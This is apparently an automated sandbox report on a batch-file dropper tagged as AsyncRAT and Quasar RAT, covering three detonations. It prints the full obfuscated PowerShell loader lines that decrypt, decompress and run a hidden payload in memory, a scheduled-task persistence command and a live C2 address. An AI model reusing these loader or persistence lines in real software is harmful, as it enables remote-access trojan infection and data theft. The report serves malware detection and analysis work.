Malware Analysis Report

2025-04-14 05:06

Sample ID 230112-t174sagg29
Target sky.bat
SHA256 d329a265d4005b2cb8902d6148ff5e4477f2203bc2e476e51e5895f9be99c53e
Tags
asyncrat quasar default office04 rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

d329a265d4005b2cb8902d6148ff5e4477f2203bc2e476e51e5895f9be99c53e

Threat Level: Known bad

The file sky.bat was found to be: Known bad.

Malicious Activity Summary

asyncrat quasar default office04 rat spyware stealer trojan

Quasar RAT

AsyncRat

Quasar payload

Async RAT payload

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Reads user/profile data of web browsers

Looks up external IP address via web service

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

Creates scheduled task(s)

Suspicious use of SetWindowsHookEx

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-01-12 16:32

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-01-12 16:32

Reported

2023-01-12 16:35

Platform

win7-20220812-en

Max time kernel

43s

Max time network

46s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Windows\system32\cmd.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1176 wrote to memory of 884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\sky.bat.exe
PID 1176 wrote to memory of 884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\sky.bat.exe
PID 1176 wrote to memory of 884 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

"sky.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sky.bat').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CeRsc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] ('')))

Network

N/A

Files

memory/884-55-0x0000000000000000-mapping.dmp

\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 852d67a27e454bd389fa7f02a8cbe23f
SHA1 5330fedad485e0e4c23b2abe1075a1f984fde9fc
SHA256 a8fdba9df15e41b6f5c69c79f66a26a9d48e174f9e7018a371600b866867dab8
SHA512 327dc74590f34185735502e289135491092a453f7f1c5ee9e588032ff68934056ffa797f28181267fd9670f7895e1350894b16ea7b0e34a190597f14aea09a4d

memory/884-57-0x000007FEFBB41000-0x000007FEFBB43000-memory.dmp

memory/884-58-0x000007FEF3BF0000-0x000007FEF4613000-memory.dmp

memory/884-60-0x00000000025E4000-0x00000000025E7000-memory.dmp

memory/884-59-0x000007FEF3090000-0x000007FEF3BED000-memory.dmp

memory/884-61-0x00000000025E4000-0x00000000025E7000-memory.dmp

memory/884-62-0x00000000025EB000-0x000000000260A000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-01-12 16:32

Reported

2023-01-12 16:35

Platform

win10-20220901-en

Max time kernel

149s

Max time network

153s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

Signatures

AsyncRat

rat asyncrat

Quasar RAT

trojan spyware quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

"sky.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sky.bat').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CeRsc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] ('')))

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbwito.bat"' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\mbwito.bat"'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mbwito.bat" "

C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe

"mbwito.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $aObMV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\mbwito.bat').Split([Environment]::NewLine);foreach ($HMeAa in $aObMV) { if ($HMeAa.StartsWith(':: ')) { $jAtOW = $HMeAa.Substring(3); break; }; };$ZFFIb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jAtOW);$ufQIZ = New-Object System.Security.Cryptography.AesManaged;$ufQIZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ufQIZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ufQIZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xOjIEV/9x6H2AllyLs+AVd39m7l0oQelRu64WlIJr2c=');$ufQIZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TIb2elsPL654mr15kjK1tw==');$iHrgg = $ufQIZ.CreateDecryptor();$ZFFIb = $iHrgg.TransformFinalBlock($ZFFIb, 0, $ZFFIb.Length);$iHrgg.Dispose();$ufQIZ.Dispose();$rCpxm = New-Object System.IO.MemoryStream(, $ZFFIb);$ZoKsk = New-Object System.IO.MemoryStream;$EUWbj = New-Object System.IO.Compression.GZipStream($rCpxm, [IO.Compression.CompressionMode]::Decompress);$EUWbj.CopyTo($ZoKsk);$EUWbj.Dispose();$rCpxm.Dispose();$ZoKsk.Dispose();$ZFFIb = $ZoKsk.ToArray();$ARNYR = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ZFFIb);$BjviT = $ARNYR.EntryPoint;$BjviT.Invoke($null, (, [string[]] ('')))

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe" /rl HIGHEST /f

Network

Country Destination Domain Proto
N/A 154.12.250.38:6606 tcp
N/A 154.12.250.38:6606 tcp
N/A 20.189.173.4:443 tcp
N/A 154.12.250.38:6606 tcp
N/A 154.12.250.38:4782 tcp
N/A 8.8.8.8:53 tools.keycdn.com udp
N/A 185.172.148.96:443 tools.keycdn.com tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 64.185.227.155:443 api.ipify.org tcp
N/A 154.12.250.38:6606 tcp

Files

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/4604-120-0x0000000000000000-mapping.dmp

memory/4604-127-0x00000112AD970000-0x00000112AD992000-memory.dmp

memory/4604-132-0x00000112ADB20000-0x00000112ADB96000-memory.dmp

memory/4604-139-0x00000112AD040000-0x00000112AD04E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/4604-141-0x00000112AD050000-0x00000112AD062000-memory.dmp

memory/4604-144-0x00000112ADBA0000-0x00000112ADC1E000-memory.dmp

memory/4604-145-0x00000112ADAE0000-0x00000112ADAFE000-memory.dmp

memory/4604-154-0x00000112ADAC0000-0x00000112ADACA000-memory.dmp

memory/4604-161-0x00000112ADC20000-0x00000112ADC80000-memory.dmp

memory/4604-168-0x00000112AE3B0000-0x00000112AE440000-memory.dmp

memory/4604-171-0x00000112AE440000-0x00000112AE462000-memory.dmp

memory/800-178-0x0000000000000000-mapping.dmp

memory/4904-179-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\mbwito.bat

MD5 2f84982ec56d82645ac61de4fb3e6e50
SHA1 92817fc3db66755ad189049f8e4ad3dbbaaa6db1
SHA256 56aa2d6eee7f10040da74bb29c3bbe1e555547249ac4fc21e53e7d6182941e9c
SHA512 2a9802c6eb9eb263b7388e6659cd424592bc151e392330ac9fb3ebf96dc1e4127db124bd412c85480247089e9db972966c735b9e049680d6200b97581135c3cd

memory/3164-198-0x0000000000000000-mapping.dmp

memory/3964-200-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 6128469adf6a46e1fde5c24182bcbece
SHA1 b1056fc0c08aa1c70dd2c4b4aaeb6ddd7661d981
SHA256 d8f5a2e911a00db37c73ad0251651a5a72cdc5455f5ae8ca2ea275d3351fc61c
SHA512 efec3e82e4c59657c2540c6c77ca5e4170fbea30d239df7d15b8f0459aba0b3ce5df3cc25ae321585f5f32e4ecc0a2f2fccbc831521598e892c5bb37ae0e8500

memory/3964-218-0x000001A472410000-0x000001A472452000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\mbwito.bat.exe

MD5 f7722b62b4014e0c50adfa9d60cafa1c
SHA1 f31c17e0453f27be85730e316840f11522ddec3e
SHA256 ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa
SHA512 7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

memory/3964-220-0x000001A4726F0000-0x000001A472778000-memory.dmp

memory/4740-222-0x0000000000000000-mapping.dmp

memory/3964-227-0x000001A473090000-0x000001A4730E0000-memory.dmp

memory/3964-228-0x000001A4731A0000-0x000001A473252000-memory.dmp

memory/3964-229-0x000001A473430000-0x000001A4735F2000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2023-01-12 16:32

Reported

2023-01-12 16:35

Platform

win10v2004-20220812-en

Max time kernel

135s

Max time network

151s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

Signatures

AsyncRat

rat asyncrat

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2891029575-1462575-1165213807-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A

Reads user/profile data of web browsers

spyware stealer

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A

Enumerates physical storage devices

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\sky.bat.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe N/A

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\sky.bat"

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

"sky.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $eIfqq = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\sky.bat').Split([Environment]::NewLine);foreach ($YiLGW in $eIfqq) { if ($YiLGW.StartsWith(':: ')) { $VuGcO = $YiLGW.Substring(3); break; }; };$uZOcm = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($VuGcO);$BacUA = New-Object System.Security.Cryptography.AesManaged;$BacUA.Mode = [System.Security.Cryptography.CipherMode]::CBC;$BacUA.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$BacUA.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CeRsc6tTBkD+M0zxU7egGVErAsa/NtkVIHXeHDUiW20=');$BacUA.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('2hn/J717js1MwdbbqMn7Lw==');$Nlgap = $BacUA.CreateDecryptor();$uZOcm = $Nlgap.TransformFinalBlock($uZOcm, 0, $uZOcm.Length);$Nlgap.Dispose();$BacUA.Dispose();$mNKMr = New-Object System.IO.MemoryStream(, $uZOcm);$bTMLk = New-Object System.IO.MemoryStream;$NVPbn = New-Object System.IO.Compression.GZipStream($mNKMr, [IO.Compression.CompressionMode]::Decompress);$NVPbn.CopyTo($bTMLk);$NVPbn.Dispose();$mNKMr.Dispose();$bTMLk.Dispose();$uZOcm = $bTMLk.ToArray();$gDBNO = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($uZOcm);$PtfdQ = $gDBNO.EntryPoint;$PtfdQ.Invoke($null, (, [string[]] ('')))

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\suuule.bat"' & exit

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Local\Temp\suuule.bat"'

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\suuule.bat" "

C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe

"suuule.bat.exe" -noprofile -windowstyle hidden -ep bypass -command $aObMV = [System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\suuule.bat').Split([Environment]::NewLine);foreach ($HMeAa in $aObMV) { if ($HMeAa.StartsWith(':: ')) { $jAtOW = $HMeAa.Substring(3); break; }; };$ZFFIb = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($jAtOW);$ufQIZ = New-Object System.Security.Cryptography.AesManaged;$ufQIZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$ufQIZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$ufQIZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('xOjIEV/9x6H2AllyLs+AVd39m7l0oQelRu64WlIJr2c=');$ufQIZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('TIb2elsPL654mr15kjK1tw==');$iHrgg = $ufQIZ.CreateDecryptor();$ZFFIb = $iHrgg.TransformFinalBlock($ZFFIb, 0, $ZFFIb.Length);$iHrgg.Dispose();$ufQIZ.Dispose();$rCpxm = New-Object System.IO.MemoryStream(, $ZFFIb);$ZoKsk = New-Object System.IO.MemoryStream;$EUWbj = New-Object System.IO.Compression.GZipStream($rCpxm, [IO.Compression.CompressionMode]::Decompress);$EUWbj.CopyTo($ZoKsk);$EUWbj.Dispose();$rCpxm.Dispose();$ZoKsk.Dispose();$ZFFIb = $ZoKsk.ToArray();$ARNYR = [System.Reflection.Assembly]::('daoL'[-1..-4] -join '')($ZFFIb);$BjviT = $ARNYR.EntryPoint;$BjviT.Invoke($null, (, [string[]] ('')))

C:\Windows\SYSTEM32\schtasks.exe

"schtasks" /create /tn "Quasar Client Startup" /sc ONLOGON /tr "C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe" /rl HIGHEST /f

Network

Country Destination Domain Proto
N/A 154.12.250.38:6606 tcp
N/A 154.12.250.38:6606 tcp
N/A 52.168.117.170:443 tcp
N/A 154.12.250.38:6606 tcp
N/A 178.79.208.1:80 tcp
N/A 178.79.208.1:80 tcp
N/A 178.79.208.1:80 tcp
N/A 154.12.250.38:4782 tcp
N/A 8.8.8.8:53 tools.keycdn.com udp
N/A 185.172.148.96:443 tools.keycdn.com tcp
N/A 8.8.8.8:53 api.ipify.org udp
N/A 64.185.227.155:443 api.ipify.org tcp
N/A 154.12.250.38:6606 tcp
N/A 154.12.250.38:6606 tcp

Files

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/3100-132-0x0000000000000000-mapping.dmp

memory/3100-134-0x000001BB55860000-0x000001BB55882000-memory.dmp

memory/3100-135-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\sky.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/3100-137-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

memory/3100-138-0x000001BB56100000-0x000001BB56176000-memory.dmp

memory/3100-139-0x000001BB561A0000-0x000001BB561BE000-memory.dmp

memory/460-140-0x0000000000000000-mapping.dmp

memory/5108-141-0x0000000000000000-mapping.dmp

memory/5108-142-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\suuule.bat

MD5 2f84982ec56d82645ac61de4fb3e6e50
SHA1 92817fc3db66755ad189049f8e4ad3dbbaaa6db1
SHA256 56aa2d6eee7f10040da74bb29c3bbe1e555547249ac4fc21e53e7d6182941e9c
SHA512 2a9802c6eb9eb263b7388e6659cd424592bc151e392330ac9fb3ebf96dc1e4127db124bd412c85480247089e9db972966c735b9e049680d6200b97581135c3cd

memory/1924-144-0x0000000000000000-mapping.dmp

memory/5108-145-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

memory/668-146-0x0000000000000000-mapping.dmp

C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 a6c9d692ed2826ecb12c09356e69cc09
SHA1 def728a6138cf083d8a7c61337f3c9dade41a37f
SHA256 a07d329eb9b4105ba442c89f7cfa0d7b263f9f0617e26df93cf8cdc8dc94d57b
SHA512 2f27d2b241ce34f988c39e17ca5a1ebe628ac6c1b8ee8df121db9ad8929eaadf5f24ad66457591cccf87e60d2ba2eab88af860ab9c323a5c2a9867045d6e7ba3

memory/668-149-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\suuule.bat.exe

MD5 04029e121a0cfa5991749937dd22a1d9
SHA1 f43d9bb316e30ae1a3494ac5b0624f6bea1bf054
SHA256 9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f
SHA512 6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

memory/400-151-0x0000000000000000-mapping.dmp

memory/668-152-0x00000243BE3F0000-0x00000243BE440000-memory.dmp

memory/668-153-0x00000243BEA00000-0x00000243BEAB2000-memory.dmp

memory/668-154-0x00000243BF070000-0x00000243BF232000-memory.dmp

memory/668-155-0x00007FFFEE480000-0x00007FFFEEF41000-memory.dmp